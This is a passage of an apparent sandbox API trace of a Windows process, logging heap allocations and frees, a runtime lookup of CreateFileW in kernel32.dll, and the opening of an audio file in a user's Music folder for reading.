0x43cffb8 [0116.582] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2880 [0116.582] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad60 [0116.582] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2820 [0116.582] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2860 [0116.582] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabe0 [0116.582] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad60 | out: hHeap=0x1780000) returned 1 [0116.582] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2820 | out: hHeap=0x1780000) returned 1 [0116.582] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabe0 | out: hHeap=0x1780000) returned 1 [0116.582] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0116.582] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2790 [0116.582] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caaf0 [0116.582] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27a0 [0116.582] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28f0 [0116.582] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad60 [0116.582] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caaf0 | out: hHeap=0x1780000) returned 1 [0116.582] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27a0 | out: hHeap=0x1780000) returned 1 [0116.582] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad60 | out: hHeap=0x1780000) returned 1 [0116.583] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28f0 | out: hHeap=0x1780000) returned 1 [0116.583] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27a0 [0116.583] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac10 [0116.583] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2800 [0116.583] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2750 [0116.583] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabe0 [0116.583] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac10 | out: hHeap=0x1780000) returned 1 [0116.583] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0116.583] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabe0 | out: hHeap=0x1780000) returned 1 [0116.583] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0116.583] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28a0 [0116.583] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabe0 [0116.583] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27f0 [0116.583] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27b0 [0116.583] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac40 [0116.583] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabe0 | out: hHeap=0x1780000) returned 1 [0116.583] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0116.583] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac40 | out: hHeap=0x1780000) returned 1 [0116.583] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0116.583] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2900 [0116.583] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabe0 [0116.583] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27b0 [0116.583] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2890 [0116.583] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac10 [0116.584] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabe0 | out: hHeap=0x1780000) returned 1 [0116.584] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0116.584] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac10 | out: hHeap=0x1780000) returned 1 [0116.584] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2890 | out: hHeap=0x1780000) returned 1 [0116.584] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28f0 [0116.584] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab20 [0116.584] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27e0 [0116.584] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27f0 [0116.584] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabe0 [0116.584] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab20 | out: hHeap=0x1780000) returned 1 [0116.584] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27e0 | out: hHeap=0x1780000) returned 1 [0116.584] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabe0 | out: hHeap=0x1780000) returned 1 [0116.584] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0116.584] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2860 [0116.584] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caaf0 [0116.584] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2910 [0116.584] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2890 [0116.584] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad60 [0116.584] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caaf0 | out: hHeap=0x1780000) returned 1 [0116.584] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2910 | out: hHeap=0x1780000) returned 1 [0116.584] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad60 | out: hHeap=0x1780000) returned 1 [0116.584] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2890 | out: hHeap=0x1780000) returned 1 [0116.584] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x772d0000 [0116.585] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad60 [0116.585] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2890 [0116.585] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0116.585] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cac88 [0116.585] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x43cac88, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileW", lpUsedDefaultChar=0x0) returned 12 [0116.585] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac88 | out: hHeap=0x1780000) returned 1 [0116.585] GetProcAddress (hModule=0x772d0000, lpProcName="CreateFileW") returned 0x7733ed10 [0116.585] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad60 | out: hHeap=0x1780000) returned 1 [0116.585] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2890 | out: hHeap=0x1780000) returned 1 [0116.585] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe78 [0116.585] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27b0 [0116.585] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27e0 [0116.585] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2890 [0116.585] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2910 [0116.585] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27f0 [0116.585] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27c0 [0116.586] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2920 [0116.586] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20002) returned 0x4506008 [0116.587] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0116.587] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27e0 | out: hHeap=0x1780000) returned 1 [0116.587] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2890 | out: hHeap=0x1780000) returned 1 [0116.587] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2910 | out: hHeap=0x1780000) returned 1 [0116.587] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0116.587] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27c0 | out: hHeap=0x1780000) returned 1 [0116.587] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2920 | out: hHeap=0x1780000) returned 1 [0116.587] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfe78 | out: hHeap=0x1780000) returned 1 [0116.587] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Music\\RjvHKIDt9\\evi6Nl1 g1KyY\\-a1fx91SeT 48T\\kEfh1XIhHEyxIZI.m4a" (normalized: "c:\\users\\fd1hvy\\music\\rjvhkidt9\\evi6nl1 g1kyy\\-a1fx91set 48t\\kefh1xihheyxizi.m4a"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x258 [0116.587] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2810 [0116.587] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43ea6b8 [0116.587] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe28 [0116.587] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab08 [0116.587] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad60 [0116.587] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caaf0 [0116.587] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2890 [0116.587] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caaf0 | out: hHeap=0x1780000) returned 1 [0116.587] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2890 | out: hHeap=0x1780000) returned 1 [0116.587] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad60 | out: hHeap=0x1780000) returned 1 [0116.587] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac40 [0116.588] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac70 [0116.588] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad60 [0116.588] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2760 [0116.588] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad60 | out: hHeap=0x1780000) returned 1 [0116.588] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xb0) returned 0x42d9660 [0116.588] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4506008 | out: hHeap=0x1780000) returned 1 [0116.588] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac88 [0116.588] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabe0 [0116.588] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac10 [0116.588] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2800 [0116.588] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac10 | out: hHeap=0x1780000) returned 1 [0116.588] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0116.588] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabe0 | out: hHeap=0x1780000) returned 1 [0116.588] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad60 [0116.588] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac10 [0116.588] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab20 | out: hHeap=0x1780000) returned 1 [0116.588] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0116.588] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac10 | out: hHeap=0x1780000) returned 1 [0116.588] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac10 | out: hHeap=0x1780000) returned 1 [0116.588] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0116.588] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabe0 | out: hHeap=0x1780000) returned 1 [0116.588] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabe0 | out: hHeap=0x1780000) returned 1 [0116.588] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27c0 | out: hHeap=0x1780000) returned 1 [0116.588] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caaf0 | out: hHeap=0x1780000) returned 1 [0116.588] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabe0 | out: hHeap=0x1780000) returned 1 [0116.588] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0116.589] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab20 | out: hHeap=0x1780000) returned 1 [0116.589] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac10 | out: hHeap=0x1780000) returned 1 [0116.589] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2890 | out: hHeap=0x1780000) returned 1 [0116.589] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabe0 | out: hHeap=0x1780000) returned 1 [0116.589] FreeLibrary (hLibModule=0x772d0000) returned 1 [0116.589] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0116.589] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2790 | out: hHeap=0x1780000) returned 1 [0116.589] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27a0 | out: hHeap=0x1780000) returned 1 [0116.589] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28a0 | out: hHeap=0x1780000) returned 1 [0116.589] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2900 | out: hHeap=0x1780000) returned 1 [0116.589] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28f0 | out: hHeap=0x1780000) returned 1 [0116.589] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0116.589] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cffb8 | out: hHeap=0x1780000) returned 1 [0116.589] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab50 | out: hHeap=0x1780000) returned 1 [0116.589] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0116.589] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9a0 | out: hHeap=0x1780000) returned 1 [0116.589] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca838 | out: hHeap=0x1780000) returned 1 [0116.589] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca868 | out: hHeap=0x1780000) returned 1 [0116.589] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca850 | out: hHeap=0x1780000) returned 1 [0116.589] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca958 | out: hHeap=0x1780000) returned 1 [0116.589] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8e0 | out: hHeap=0x1780000) returned 1 [0116.589] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca790 | out: hHeap=0x1780000) returned 1 [0116.589] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa78 | out: hHeap=0x1780000) returned 1 [0116.589] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cacd0 | out: hHeap=0x1780000) returned 1 [0116.589] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad48 | out: hHeap=0x1780000) returned 1 [0116.589] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caaa8 | out: hHeap=0x1780000) returned 1 [0116.589] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab68 | out: hHeap=0x1780000) returned 1 [0116.589] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caca0 | out: hHeap=0x1780000) returned 1 [0116.590] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cace8 | out: hHeap=0x1780000) returned 1 [0116.590] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac28 | out: hHeap=0x1780000) returned 1 [0116.590] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cacb8 | out: hHeap=0x1780000) returned 1 [0116.590] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabb0 | out: hHeap=0x1780000) returned 1 [0116.590] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab38 | out: hHeap=0x1780000) returned 1 [0116.590] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caac0 | out: hHeap=0x1780000) returned 1 [0116.590] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad18 | out: hHeap=0x1780000) returned 1 [0116.590] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad00 | out: hHeap=0x1780000) returned 1 [0116.590] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabf8 | out: hHeap=0x1780000) returned 1 [0116.590] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab98 | out: hHeap=0x1780000) returned 1 [0116.590] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab80 | out: hHeap=0x1780000) returned 1 [0116.590] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac58 | out: hHeap=0x1780000) returned 1 [0116.590] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabc8 | out: hHeap=0x1780000) returned 1 [0116.590] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad30 | out: hHeap=0x1780000) returned 1 [0116.590] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caad8 | out: hHeap=0x1780000) returned 1 [0116.590] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41a4618 | out: hHeap=0x1780000) returned 1 [0116.590] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28e0 | out: hHeap=0x1780000) returned 1 [0116.590] PeekMessageW (in: lpMsg=0x144e4f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e4f4) returned 0 [0116.590] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9350 | out: hHeap=0x1780000) returned 1 [0116.590] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27e0 | out: hHeap=0x1780000) returned 1 [0116.590] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2820 | out: hHeap=0x1780000) returned 1 [0116.590] PeekMessageW (in: lpMsg=0x144e4f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e4f4) returned 0 [0116.590] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2820 | out: hHeap=0x1780000) returned 1 [0116.590] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28f0 | out: hHeap=0x1780000) returned 1 [0116.590] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28e0 | out: hHeap=0x1780000) returned 1 [0116.590] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac58 | out: hHeap=0x1780000) returned 1 [0116.590] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfef0 | out: hHeap=0x1780000) returned 1 [0116.590] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796de8 | out: hHeap=0x1780000) returned 1 [0116.590] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0116.590] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0116.590] PeekMessageW (in: lpMsg=0x144e4f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e4f4) returned 0 [0116.591] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2820 | out: hHeap=0x1780000) returned 1 [0116.591] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0116.591] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9260 | out: hHeap=0x1780000) returned 1 [0116.591] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca970 | out: hHeap=0x1780000) returned 1 [0116.591] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca910 | out: hHeap=0x1780000) returned 1 [0116.591] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0116.591] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0238 | out: hHeap=0x1780000) returned 1 [0116.591] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa30 | out: hHeap=0x1780000) returned 1 [0116.591] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfdb0 | out: hHeap=0x1780000) returned 1 [0116.591] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0116.591] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d00f8 | out: hHeap=0x1780000) returned 1 [0116.591] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca898 | out: hHeap=0x1780000) returned 1 [0116.591] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7a8 | out: hHeap=0x1780000) returned 1 [0116.591] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0210 | out: hHeap=0x1780000) returned 1 [0116.591] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0116.591] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0030 | out: hHeap=0x1780000) returned 1 [0116.591] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7f0 | out: hHeap=0x1780000) returned 1 [0116.591] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca928 | out: hHeap=0x1780000) returned 1 [0116.591] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0116.591] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cffe0 | out: hHeap=0x1780000) returned 1 [0116.591] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca808 | out: hHeap=0x1780000) returned 1 [0116.591] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43918c0 | out: hHeap=0x1780000) returned 1 [0116.591] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0116.591] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0058 | out: hHeap=0x1780000) returned 1 [0116.591] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca940 | out: hHeap=0x1780000) returned 1 [0116.591] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd88 | out: hHeap=0x1780000) returned 1 [0116.591] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0116.591] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d01c0 | out: hHeap=0x1780000) returned 1 [0116.591] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa48 | out: hHeap=0x1780000) returned 1 [0116.591] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd60 | out: hHeap=0x1780000) returned 1 [0116.592] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0116.592] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfea0 | out: hHeap=0x1780000) returned 1 [0116.592] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab08 | out: hHeap=0x1780000) returned 1 [0116.592] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x42d9660 | out: hHeap=0x1780000) returned 1 [0116.592] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0116.592] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac70 | out: hHeap=0x1780000) returned 1 [0116.592] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac40 | out: hHeap=0x1780000) returned 1 [0116.592] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac88 | out: hHeap=0x1780000) returned 1 [0116.592] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad60 | out: hHeap=0x1780000) returned 1 [0116.592] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad78 | out: hHeap=0x1780000) returned 1 [0116.592] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa90 | out: hHeap=0x1780000) returned 1 [0116.592] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caaf0 | out: hHeap=0x1780000) returned 1 [0116.592] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab20 | out: hHeap=0x1780000) returned 1 [0116.592] HeapFree (in: 